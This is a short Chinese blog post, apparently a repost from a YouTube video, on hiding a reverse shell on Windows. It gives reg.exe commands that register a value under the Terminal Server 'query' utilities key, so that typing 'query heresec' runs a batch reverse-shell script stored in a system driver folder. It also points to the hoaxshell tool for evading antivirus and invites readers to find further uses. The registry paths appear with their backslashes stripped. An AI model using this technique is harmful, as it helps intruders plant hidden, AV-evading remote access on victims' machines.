用一条命令来隐藏反向Shell

电子说

1.3w人已加入

描述

From:https://www.youtube.com/watch?v=gzv3d7rvjKA

注册表路径:

 

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerUtilitiesquery

 

包含了与终端服务器相关的设置和配置信息。

执行命令query可以查看服务器的一些状态,实际上是执行此项值中的可执行文件。

Shell

Shell

添加一条,打开计算器。

 

reg.exe add "HKLMSYSTEMCurrentControlSetControlTerminal ServerUtilitiesquery" /v heresec /t REG_MULTI_SZ /d 01hereseccalc.exe

 

Shell

这里再介绍一个能够绕过一些AV的Windows反向shell生成器和交互程序。(测试环境用的X绒,可以绕过,经测试不能绕过Windows Defender的AMSI)。

 

https://github.com/t3l3machus/hoaxshell

 

Shell

将命令写入一个bat脚本中,然后添加注册表后执行。

Shell

 

reg.exe add "HKLMSYSTEMCurrentControlSetControlTerminal ServerUtilitiesquery" /v heresec /t REG_MULTI_SZ /d 01heresecC:WindowsSystem32spooldriverscolor1.bat query heresec

 

只需执行命令query heresec即可运行反弹shell脚本。

Shell

还能怎么用,再联想一下。

 

打开APP阅读更多精彩内容
声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉

全部0条评论

快来发表一下你的评论吧 !

×
20
完善资料,
赚取积分